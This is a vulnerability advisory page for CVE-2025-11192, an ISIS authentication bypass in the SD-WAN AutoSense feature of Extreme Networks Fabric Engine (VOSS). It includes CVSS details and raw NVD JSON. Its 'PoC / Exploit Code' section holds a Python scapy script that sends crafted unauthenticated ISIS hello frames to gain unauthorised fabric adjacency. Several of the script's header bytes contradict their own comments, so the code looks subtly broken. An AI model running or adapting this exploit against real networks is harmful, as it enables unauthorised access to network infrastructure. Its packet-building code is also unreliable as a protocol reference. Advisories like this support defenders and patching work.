Security Vulnerability Report
中文
CVE-2025-11192 CVSS 8.6 HIGH

CVE-2025-11192

Published: 2025-10-07 19:15:34
Last Modified: 2026-01-15 02:10:58
Source: 1c053176-eef3-4d6a-ae0b-24728c86587b

Description

A vulnerability in Extreme Networks’ Fabric Engine (VOSS) before 9.3 was discovered. When SD-WAN AutoSense is enabled on a port, it may automatically configure fabric connectivity without validating ISIS authentication settings. The SD-WAN AutoSense implementation may be exploited by malicious actors by allowing unauthorized access to network fabric and configuration data.

CVSS Details

CVSS Score
8.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:extremenetworks:fabric_engine_\(voss\):*:*:*:*:*:*:*:* - VULNERABLE
Extreme Networks Fabric Engine (VOSS) < 9.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-11192 - Extreme Networks Fabric Engine (VOSS) SD-WAN AutoSense Authentication Bypass PoC # This PoC demonstrates the concept of exploiting the missing ISIS authentication validation # in SD-WAN AutoSense feature #!/usr/bin/env python3 """ CVE-2025-11192 PoC - SD-WAN AutoSense ISIS Authentication Bypass Disclaimer: This PoC is for educational and authorized testing purposes only. """ from scapy.all import * from scapy.layers.inet import IP, UDP import time class ISISPDU: """Craft ISIS Protocol Data Unit for Fabric Engine exploitation""" ISIS_HELLO = 0x0F # ISIS Hello PDU type ISIS_P2P_HELLO = 0x10 # Point-to-Point ISIS Hello def __init__(self, system_id="1921.6800.0001"): self.system_id = system_id def craft_p2p_hello(self): """Craft a P2P ISIS Hello packet without authentication""" # ISIS Common Header isis_header = bytes([ 0x83, # Protocol Discriminator (Network Layer Protocol ID) 0x1B, # Header Length 0x01, # Version/Protocol ID Extension 0x00, # ID Length (System ID length = 6 bytes) 0x00, # PDU Type (L1 Hello) 0x01, # Version 0x00, # Reserved 0x00, # Maximum Area Addresses ]) # Source ID (attacker system ID) source_id = bytes([0x01, 0x92, 0x16, 0x80, 0x00, 0x01]) # Holding Time holding_time = b'\x00\x0a' # PDU Length pdu_length = b'\x00\x15' # Circuit Type (Level 1) circuit_type = b'\x01' # System ID system_id_bytes = bytes([0x19, 0x21, 0x68, 0x00, 0x00, 0x01]) # Hello Interval hello_interval = b'\x00\x0a' pdu = isis_header + source_id + holding_time + pdu_length + circuit_type + system_id_bytes + hello_interval return pdu def exploit_autosense(self, target_interface="eth0"): """Exploit SD-WAN AutoSense by sending crafted ISIS packets""" print(f"[*] CVE-2025-11192 - SD-WAN AutoSense Authentication Bypass PoC") print(f"[*] Target interface: {target_interface}") print(f"[*] Sending crafted ISIS P2P Hello without authentication...") pdu = self.craft_p2p_hello() # ISIS uses link-local multicast on Layer 2 # All Level 1 ISs: 01:80:c2:00:00:14 # All Level 2 ISs: 01:80:c2:00:00:15 dst_mac = "01:80:c2:00:00:15" # Send the packet multiple times to ensure detection by AutoSense for i in range(5): packet = Ether(dst=dst_mac) / Raw(load=pdu) sendp(packet, iface=target_interface, verbose=False) print(f"[+] Packet {i+1} sent successfully") time.sleep(1) print(f"[*] Exploit completed. Check if Fabric adjacency was established.") print(f"[*] If successful, unauthorized access to Fabric network is achieved.") if __name__ == "__main__": import sys iface = sys.argv[1] if len(sys.argv) > 1 else "eth0" exploit = ISISPDU() exploit.exploit_autosense(iface)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11192", "sourceIdentifier": "1c053176-eef3-4d6a-ae0b-24728c86587b", "published": "2025-10-07T19:15:33.863", "lastModified": "2026-01-15T02:10:58.137", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in Extreme Networks’ Fabric Engine (VOSS) before 9.3 was discovered. When SD-WAN AutoSense is enabled on a port, it may automatically configure fabric connectivity without validating ISIS authentication settings. The SD-WAN AutoSense implementation may be exploited by malicious actors by allowing unauthorized access to network fabric and configuration data."}], "metrics": {"cvssMetricV40": [{"source": "1c053176-eef3-4d6a-ae0b-24728c86587b", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:P/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.0}]}, "weaknesses": [{"source": "1c053176-eef3-4d6a-ae0b-24728c86587b", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:extremenetworks:fabric_engine_\\(voss\\):*:*:*:*:*:*:*:*", "versionEndExcluding": "9.3", "matchCriteriaId": "3CB5806F-8C23-4D5C-A599-14B6337B25F4"}]}]}], "references": [{"url": "https://extreme-networks.my.site.com/ExtrArticleDetail?an=000130291", "source": "1c053176-eef3-4d6a-ae0b-24728c86587b", "tags": ["Vendor Advisory"]}]}}